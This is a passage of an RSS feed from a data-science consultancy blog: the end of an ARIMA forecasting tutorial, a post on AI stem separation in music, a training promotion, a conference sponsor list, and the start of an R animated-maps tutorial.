&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(&lt;span style="color:#79c0ff"&gt;f&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;RMSE: &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;{&lt;/span&gt;rmse&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## RMSE: 73.86518520797583
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(test, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;blue&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;observed&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot(predictions, color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;red&amp;#34;&lt;/span&gt;, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;ARIMA&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;xlabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;month&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ylabel(&lt;span style="color:#a5d6ff"&gt;&amp;#34;passengers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;legend()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/plots/forecast-15.png" alt="Plot showing the passenger time series for a year of monthly data. We again show the observations in blue. In red we show the 12-month forecast produced by the ARIMA model. The agreement is poor here. The predictions produce a noisy trend that gradually increases over time, from 450 passengers at month 0 to over 500 passengers at month 12. This disagrees with the observations which display a maximum of over 600 passengers at month 6 and minima of less than 400 passengers at months 1 and 10, suggesting that the model has failed to capture the seasonality of the data." /&gt;
&lt;p&gt;The agreement is poor here. As noted earlier, ARIMA does not account for
seasonal variation and we can see here the model is not able to
reproduce the peak at month 6. It would therefore be worth repeating
this analysis with the SARIMA method, which is also implemented in
&lt;code&gt;statsmodels&lt;/code&gt;.&lt;/p&gt;
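&lt;p&gt;To get a feel for how much a seasonal term can matter, here is a rough sketch of a seasonal-naive baseline, which forecasts each month as the value observed 12 months earlier. This is not SARIMA, and the series is synthetic (a linear trend plus a yearly sine wave), not the airline data; the function name is hypothetical.&lt;/p&gt;

```python
import math


def seasonal_naive_forecast(history, steps, period=12):
    """Forecast each future point as the value observed one full season earlier."""
    if period > len(history):
        raise ValueError("history must cover at least one full period")
    start = len(history) - period
    # For horizons longer than one period, the last season is reused cyclically
    return [history[start + (step % period)] for step in range(steps)]


# Synthetic monthly series: trend of +2 per month plus a yearly cycle
series = [100 + 2 * t + 20 * math.sin(2 * math.pi * t / 12) for t in range(48)]
history, future = series[:36], series[36:]

forecast = seasonal_naive_forecast(history, steps=12)

# The seasonal shape is reproduced; only one year of trend (2 * 12) is missed
print(round(future[0] - forecast[0], 6))  # 24.0
```

&lt;p&gt;On this toy series the baseline captures the peaks and troughs but lags the trend by a constant amount. A seasonal model such as SARIMA aims to capture both.&lt;/p&gt;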
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In summary, we have introduced the ARIMA framework for time series
forecasting using a real-world example in Python. Along the way, we have
learned about popular data visualisations for time series data and
explored the time series analysis functions provided by the
&lt;code&gt;statsmodels&lt;/code&gt; package. Check out the &lt;a href="https://www.statsmodels.org/dev/tsa.html" rel="external"&gt;&lt;code&gt;statsmodels&lt;/code&gt;
documentation&lt;/a&gt; for more
examples.&lt;/p&gt;
&lt;p&gt;It’s worth mentioning that, while ARIMA is a powerful method for time
series forecasting, there are a number of other popular frameworks for
different use cases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;SARIMA: expands on ARIMA by modelling seasonal variation.&lt;/li&gt;
&lt;li&gt;Prophet: an alternative time series framework that can capture yearly,
weekly and daily seasonality.&lt;/li&gt;
&lt;li&gt;DeepAR: an efficient deep learning algorithm designed to fit multiple
time series with a single global model. This can outperform ARIMA in
scenarios where hundreds of time series have to be modelled.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We may revisit these models in a later post. In the meantime, check out
our recent &lt;a href="https://www.jumpingrivers.com/blog/?search=vetiver" rel="external"&gt;blog
series&lt;/a&gt; on MLOps,
including model versioning, deployment and monitoring using the Vetiver
framework.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/time-series-forecasting-python-arima/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Stem Separation - How AI Has Found Its Way Into Music Production</title><link>https://www.jumpingrivers.com/blog/stem-splitting/</link><pubDate>Thu, 14 Aug 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/stem-splitting/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/stem-splitting/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/stem-splitting/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;For quite some time, AI had kept its grubby little hands out of the
music production world. Now, a good percentage of the plugins (a plugin
is a piece of software you can “plug in” to an audio track to add
effects or generate audio) I see are advertised as “using AI”, from
reverb removers (yes, that’s right, you can now remove the reverb from
an audio recording) to EQ analysers. Today we’ll focus on stem
separation.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-stem_splitting"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="what-is-a-stem"&gt;What is a stem?&lt;/h2&gt;
&lt;p&gt;I’m approaching this blog as more of an introduction to stem separation.
There might be a follow-up with more technical details later on, but
plenty of articles already cover the details in depth.&lt;/p&gt;
&lt;p&gt;Before we can separate stems, we need to know what a stem is.&lt;/p&gt;
&lt;p&gt;Every song that you or I listen to will likely contain multiple
instruments/elements. A classic band line-up might have a drummer,
bassist, guitarist and singer. Orchestras can have up to 60 musicians!
Nowadays, the vast majority of songs are produced in a Digital Audio
Workstation (DAW) in which the number of tracks you can have is really
only limited by the power of your computer.&lt;/p&gt;
&lt;p&gt;A stem is an audio file from one of the above setups that combines a
group of related audio tracks recorded for a song. There could
be a vocal stem, containing all lead and background vocals combined into
one audio track, or a drums stem with the kick, snare, hi-hats, etc. mixed
together.&lt;/p&gt;
&lt;h2 id="what-is-stem-separation"&gt;What is stem separation?&lt;/h2&gt;
&lt;p&gt;Take a piece of cake. What if I wanted to return it to its
constituent parts of egg, flour, sugar, etc.? Well, I can’t. With stem
separation, though, we can take an audio file containing several stems and
separate it into several audio files - one for each stem. Phew, I
can get my eggs back!&lt;/p&gt;
&lt;h2 id="why-is-this-useful"&gt;Why is this useful?&lt;/h2&gt;
&lt;p&gt;Stem separation is useful because it unlocks creative, educational, and
professional possibilities from a mixed audio track - even when the
original session files are unavailable.&lt;/p&gt;
&lt;p&gt;There are some legitimate uses of stem separation. The best one
that comes to mind is the last ever Beatles song, Now And Then. &lt;a href="https://www.youtube.com/watch?v=APJAQoSCwuA&amp;ab_channel=TheBeatlesVEVO" rel="external"&gt;AI was
used to extract John Lennon’s vocals from an old
demo&lt;/a&gt;,
and Paul McCartney and Ringo Starr then turned it into the last ever
Beatles record.&lt;/p&gt;
&lt;p&gt;On the other hand, stem separation gives almost anyone with an internet
connection the ability to access the stems of virtually any song -
offering music producers a treasure trove of isolated vocals (and
lawsuits).&lt;/p&gt;
&lt;h2 id="whats-behind-the-magic"&gt;What’s behind the magic?&lt;/h2&gt;
&lt;p&gt;Machine learning models. Think of it this way - every instrument makes a
sound that usually has a fairly identifiable pattern on a spectrogram.
The main body of a hi-hat lies around 10-15 kHz whilst the energy of a
bass guitar lies anywhere between 50 and 200 Hz. Sure, two different
hi-hats will have different waveforms and frequencies but the general
pattern is the same.&lt;/p&gt;
&lt;p&gt;&lt;img
src="https://www.jumpingrivers.com/blog/stem-splitting/images/hi-hat-freq.png"
alt="Frequency graph of a hi-hat."
style="display: block; margin: auto; width:55%;"
/&gt;&lt;/p&gt;
&lt;p&gt;Frequency graph of a hi-hat.&lt;/p&gt;
&lt;br /&gt;
&lt;p&gt;&lt;img
src="https://www.jumpingrivers.com/blog/stem-splitting/images/bass-freq.png"
alt="Frequency graph of a bass guitar."
style="display: block; margin: auto; width:55%;"
/&gt;&lt;/p&gt;
&lt;p&gt;Frequency graph of a bass guitar.&lt;/p&gt;
&lt;p&gt;These models are trained on the frequency data of songs for which the
stems are available, so they learn which frequency patterns belong to
which instrument. Once we know that, we can apply filters to pick and
choose which frequencies we want to keep from the original song.&lt;/p&gt;
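&lt;p&gt;As a toy illustration of that filtering idea, the sketch below mixes a low “bass” sine wave with a high “hi-hat” sine wave, moves to the frequency domain, zeroes the high-frequency bins and transforms back. Everything here is an assumption made for illustration: the signals are pure tones, the cut-off is picked by hand, and the function names are hypothetical. A real separator has to learn where, and when, to apply such masks.&lt;/p&gt;

```python
import cmath
import math


def dft(signal):
    """Naive discrete Fourier transform (fine for a short toy signal)."""
    n = len(signal)
    return [
        sum(signal[t] * cmath.exp(-2j * math.pi * k * t / n) for t in range(n))
        for k in range(n)
    ]


def inverse_dft(spectrum):
    """Inverse transform, keeping the real part of each reconstructed sample."""
    n = len(spectrum)
    return [
        sum(spectrum[k] * cmath.exp(2j * math.pi * k * t / n) for k in range(n)).real / n
        for t in range(n)
    ]


def keep_low_bins(spectrum, max_bin):
    """Zero every bin above max_bin, treating bin k and its mirror n - k alike."""
    n = len(spectrum)
    return [
        value if max_bin >= min(k, n - k) else 0
        for k, value in enumerate(spectrum)
    ]


n = 64
bass = [math.sin(2 * math.pi * 2 * t / n) for t in range(n)]           # low tone
hi_hat = [0.5 * math.sin(2 * math.pi * 20 * t / n) for t in range(n)]  # high tone
mix = [b + h for b, h in zip(bass, hi_hat)]

# Keep only the low bins of the mix, then return to the time domain
recovered_bass = inverse_dft(keep_low_bins(dft(mix), max_bin=5))
worst_error = max(abs(r - b) for r, b in zip(recovered_bass, bass))
print(1e-9 > worst_error)  # True
```

&lt;p&gt;The recovery is essentially exact here only because the two tones do not overlap in frequency. Real instruments share frequency ranges, which is where simple filters stop working.&lt;/p&gt;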
&lt;p&gt;Of course, it’s a bit more complicated than that. For more technical
details you can head to &lt;a href="https://www.linkedin.com/pulse/machine-learning-models-behind-musicais-stem-service-scott-josephson-d5ttf/" rel="external"&gt;this
article&lt;/a&gt;
which focuses on the model behind music.ai’s stem separation (music.ai
claim to have the best model).&lt;/p&gt;
&lt;h2 id="how-accurate-is-it"&gt;How accurate is it?&lt;/h2&gt;
&lt;p&gt;As with any model, to measure its accuracy you need data for which
you have the original stems.&lt;/p&gt;
&lt;p&gt;Once the stems are separated, accuracy evaluation is done using SDR -
Signal-to-Distortion Ratio. This is basically a measure of how much
distortion / artefacts have been introduced during the separation
process compared to the original stem. SDR is usually quoted in
decibels: the higher the value, the cleaner the separation.&lt;/p&gt;
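&lt;p&gt;In its simplest form, SDR compares the energy of the original stem with the energy of the error between the original and the separated stem, on a decibel scale. The sketch below uses that basic definition on made-up samples; the function name is hypothetical, and published benchmarks typically use more elaborate variants.&lt;/p&gt;

```python
import math


def sdr_db(reference, estimate):
    """Basic signal-to-distortion ratio in decibels (higher is better)."""
    if len(reference) != len(estimate):
        raise ValueError("reference and estimate must have the same length")
    signal_power = sum(r * r for r in reference)
    error_power = sum((r - e) ** 2 for r, e in zip(reference, estimate))
    if error_power == 0:
        return math.inf  # a perfect reconstruction has no distortion at all
    return 10 * math.log10(signal_power / error_power)


# Made-up samples: the estimate is the reference scaled down by 10%
reference = [1.0, -1.0, 1.0, -1.0]
estimate = [0.9, -0.9, 0.9, -0.9]
print(round(sdr_db(reference, estimate), 2))  # 20.0
```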
&lt;p&gt;Anyway, I’ll leave a deeper dive into the SDR calculation until the next
blog. To test its accuracy, why don’t we actually split some stems?&lt;/p&gt;
&lt;h2 id="an-example"&gt;An example&lt;/h2&gt;
&lt;p&gt;Let’s take this 8-bar loop consisting of drums, bass, guitar and vocal
samples that I put together (all royalty free, of course).&lt;/p&gt;
&lt;video controls="controls"&gt;
&lt;source src="images/pre-sep-vid.mov"&gt;
&lt;/video&gt;
&lt;p&gt;I’m using the inbuilt stem splitter from Logic Pro, Apple’s DAW for
macOS. It is generally considered to be lacking compared to other tools
such as music.ai or lalal.ai, but it’s good for an example!&lt;/p&gt;
&lt;p&gt;It takes maybe 4 seconds to run an audio clip of this size through the
stem splitter, and this is the result:&lt;/p&gt;
&lt;video controls="controls"&gt;
&lt;source src="images/post-sep-vid.mov"&gt;
&lt;/video&gt;
&lt;p&gt;You can clearly hear the distortion and artefacts that have been
introduced into each clip. We’re still at the stage where stem
separation algorithms struggle with music that has lots of hard
transients (e.g. drums) or lots of components that share the same
frequency range. It’s easy to hear the audio ducking in the vocals, bass
and guitar when the drums are hitting, and the splitter has struggled
quite badly with the guitar.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/stem-splitting/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>How We Do Training at Jumping Rivers: Seamless, Expert-Led, and Tailored to You</title><link>https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/</link><pubDate>Tue, 12 Aug 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When it comes to data science training, one size doesn’t fit all.
At &lt;a href="https://jmpr.io/" rel="external"&gt;Jumping Rivers&lt;/a&gt;, we’ve built our reputation around delivering customised,
expert-led training that actually fits your team’s goals, tools, and workflows -
whether you&amp;rsquo;re in healthcare, government, finance, or beyond.&lt;/p&gt;
&lt;p&gt;From your first enquiry to post-course follow-up, our training
process is fully managed by our experienced admin team.
They act as project managers, coordinating every detail to
ensure your training runs smoothly.&lt;/p&gt;
&lt;p&gt;Check out our &lt;a href="https://jmpr.io/training" rel="external"&gt;training page&lt;/a&gt; for more information or to see our course
catalogue and upcoming open courses.&lt;/p&gt;
&lt;h2 id="start-with-a-free-training-audit"&gt;Start with a Free Training Audit&lt;/h2&gt;
&lt;p&gt;Not sure what your team needs? That’s what our &lt;strong&gt;free training audit&lt;/strong&gt; is for.
We’ll assess your current skill levels, challenges, and goals, then design a
course (or training pathway) that hits the mark. No guesswork, just clarity.&lt;/p&gt;
&lt;h2 id="moving-beyond-legacy-tools"&gt;Moving beyond legacy tools?&lt;/h2&gt;
&lt;p&gt;We’ve helped multiple organisations &lt;strong&gt;transition from legacy
tools like SPSS, SAS, or proprietary R setups into streamlined
workflows using R, Python, and SQL.&lt;/strong&gt; Whether you&amp;rsquo;re modernising your
analytical toolchain or just starting the journey, we can support
smooth and confident transitions.&lt;/p&gt;
&lt;p&gt;We also assist with setting up &lt;strong&gt;consistent, reproducible documents
and reports&lt;/strong&gt; using &lt;strong&gt;Quarto&lt;/strong&gt; across your team, ensuring your outputs
look great and follow best practices in reproducible research.&lt;/p&gt;
&lt;h2 id="what-makes-jumping-rivers-training-different"&gt;What Makes Jumping Rivers Training Different?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tailored Content:&lt;/strong&gt; Every course is designed around your data, your workflows, and your team’s skill level.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Expert Trainers:&lt;/strong&gt; Our trainers are experienced data scientists, not just instructors.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Full Admin Support:&lt;/strong&gt; You get project-managed coordination from enquiry to delivery.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Flexible Delivery:&lt;/strong&gt; Online, onsite, or hybrid.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Post-Course Follow-Up:&lt;/strong&gt; We don’t disappear after the session ends. We offer optional office hours and ongoing support.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="the-jumping-rivers-training-journey"&gt;The Jumping Rivers Training Journey&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Step&lt;/th&gt;
&lt;th style="text-align: left"&gt;What Happens&lt;/th&gt;
&lt;th style="text-align: left"&gt;Who&amp;rsquo;s Involved&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;1. Enquiry&lt;/td&gt;
&lt;td style="text-align: left"&gt;You contact us via email, website, or framework&lt;/td&gt;
&lt;td style="text-align: left"&gt;You&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;2. Intro Call&lt;/td&gt;
&lt;td style="text-align: left"&gt;We assess your team’s needs&lt;/td&gt;
&lt;td style="text-align: left"&gt;You &amp;amp; JR Trainer &amp;amp; Admin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;3. Proposal&lt;/td&gt;
&lt;td style="text-align: left"&gt;Customised schedule + pricing sent for approval&lt;/td&gt;
&lt;td style="text-align: left"&gt;JR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;4. Coordination&lt;/td&gt;
&lt;td style="text-align: left"&gt;We handle all the logistics&lt;/td&gt;
&lt;td style="text-align: left"&gt;JR Admin Team&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;5. Delivery&lt;/td&gt;
&lt;td style="text-align: left"&gt;Hands-on, engaging session&lt;/td&gt;
&lt;td style="text-align: left"&gt;JR Trainer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;6. Follow-Up&lt;/td&gt;
&lt;td style="text-align: left"&gt;Feedback, future planning, optional support&lt;/td&gt;
&lt;td style="text-align: left"&gt;You &amp;amp; JR&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="what-clients-say"&gt;What Clients Say&lt;/h2&gt;
&lt;p&gt;“The Shiny course was excellent. Our team now feels confident building dashboards that actually get used.”
— Head of Data, Financial Services Firm&lt;/p&gt;
&lt;p&gt;“They handled all the admin and scheduling—it was a completely hassle-free experience.”
— L&amp;amp;D Manager, Higher Education&lt;/p&gt;
&lt;p&gt;“We wanted training that wasn’t just theoretical. JR helped us apply best practices in real-world settings.”
— Data Manager, NHS Trust&lt;/p&gt;
&lt;h2 id="lets-talk-training"&gt;Let’s Talk Training&lt;/h2&gt;
&lt;p&gt;Whether you need a one-off session, a full training pathway, or you’re just not sure where to start,
&lt;strong&gt;we’re here to help&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;📩 Book your &lt;strong&gt;free training audit&lt;/strong&gt; today: reach out to us at &lt;a href="mailto:training@jumpingrivers.com"&gt;training@jumpingrivers.com&lt;/a&gt;. We’d love to hear from you.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jr-training-2025-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Sponsors</title><link>https://www.jumpingrivers.com/blog/sip-2025-sponsors/</link><pubDate>Tue, 05 Aug 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip-2025-sponsors/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip-2025-sponsors/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip-2025-sponsors/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production Conference &lt;/a&gt; wouldn&amp;rsquo;t be possible without our sponsors, so we wanted to take the time to tell you a little bit about them.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t miss out on this great chance to learn from R experts and network with fellow data science enthusiasts! Tickets are available at &lt;a href="https://shiny-in-production.jumpingrivers.com/#registration" rel="external"&gt;Shiny in Production website&lt;/a&gt;!&lt;/p&gt;
&lt;h3 id="posit"&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Posit (formerly known as RStudio) is a software company that builds both open‑source tools and professional solutions enabling teams to create, manage, and share reproducible data work in R, Python, and beyond.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://posit.co/" rel="external"&gt;&lt;img src="logo-posit.svg" alt="Posit" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="thinkr"&gt;&lt;a href="https://thinkr.fr/" rel="external"&gt;ThinkR&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;ThinkR is a consultancy company offering development and training on R, RStudio and Shiny.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://thinkr.fr/" rel="external"&gt;&lt;img src="logo-thinkr.png" alt="thinkR" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="datacove"&gt;&lt;a href="http://www.datacove.co.uk" rel="external"&gt;Datacove&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="http://www.datacove.co.uk" rel="external"&gt;Datacove&lt;/a&gt; are a Brighton based Data and analytics consultancy, specialising in Customer Analytics (unearthing your most valuable customers), Marketing Analytics (getting more out of your marketing budget) and Process Automation.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.datacove.co.uk" rel="external"&gt;&lt;img src="logo-datacove.png" alt="Posit" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="newcastle-university-solve"&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;Newcastle University Solve&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;Newcastle University Solve (NU Solve)&lt;/a&gt; has been helping businesses, public sector organisations and industries to find answers to complex challenges for more than three decades. They emerged out of the Industrial Statistics Research Unit, which had successfully engaged with enterprises since 1984.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;&lt;img src="nu-solve_logo.png" alt="NU Solve" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="crc-press"&gt;&lt;a href="https://www.taylorfrancis.com/" rel="external"&gt;CRC Press&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.taylorfrancis.com/" rel="external"&gt;CRC Press&lt;/a&gt; is a scientific publisher that specializes in science, technology, engineering, mathematics, and medicine. They publish books and digital resources for researchers, academics, professionals, and students. CRC Press is part of the Taylor &amp;amp; Francis Group.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.taylorfrancis.com/" rel="external"&gt;&lt;img src="logo-crc.svg" alt="CRC Press" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="r-consortium"&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The central mission of the R Consortium is to work with and provide support to the R Foundation and to the key organizations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;&lt;img src="r-consortium-logo.png" alt="R Consortium Logo" style="width: 300px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip-2025-sponsors/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Animated Maps with {ggplot2} and {gganimate}</title><link>https://www.jumpingrivers.com/blog/animated-map/</link><pubDate>Thu, 31 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/animated-map/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/animated-map/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/animated-map/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;In this blog post, we are going to use data from the
&lt;a href="https://cran.r-project.org/web/packages/gapminder/readme/README.html" rel="external"&gt;{gapminder}&lt;/a&gt;
R package, along with global spatial boundaries from
&lt;a href="https://public.opendatasoft.com/explore/dataset/world-administrative-boundaries/table/" rel="external"&gt;‘opendatasoft’&lt;/a&gt;.
We are going to plot the life expectancy of each country in the Americas
and animate it to see the changes from 1952 to 2007.&lt;/p&gt;
&lt;p&gt;The {gapminder} package we are using is from the
&lt;a href="https://www.gapminder.org/" rel="external"&gt;Gapminder&lt;/a&gt; foundation, an independent
educational non-profit fighting global misconceptions. They cover issues
like global warming, plastic in the oceans and life satisfaction.&lt;/p&gt;
&lt;p&gt;First we will load the full dataset from the gapminder package, and see
what is contained within it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gapminder_unfiltered&amp;#34;&lt;/span&gt;, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;gapminder&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(gapminder_unfiltered)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## [1] &amp;quot;country&amp;quot; &amp;quot;continent&amp;quot; &amp;quot;year&amp;quot; &amp;quot;lifeExp&amp;quot; &amp;quot;pop&amp;quot; &amp;quot;gdpPercap&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then we will filter the dataset to keep life expectancy data for the
years from 1952 to 2007 (in 5-year steps).&lt;/p&gt;
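&lt;p&gt;The filtering step itself is not shown in this post. A minimal sketch of one way to do it, assuming {dplyr} and {gapminder} are installed, is below. The names &lt;code&gt;keep_years&lt;/code&gt; and &lt;code&gt;gapminder_5yr&lt;/code&gt; are hypothetical and used only for illustration; the rest of the post continues to refer to &lt;code&gt;gapminder_unfiltered&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(dplyr)

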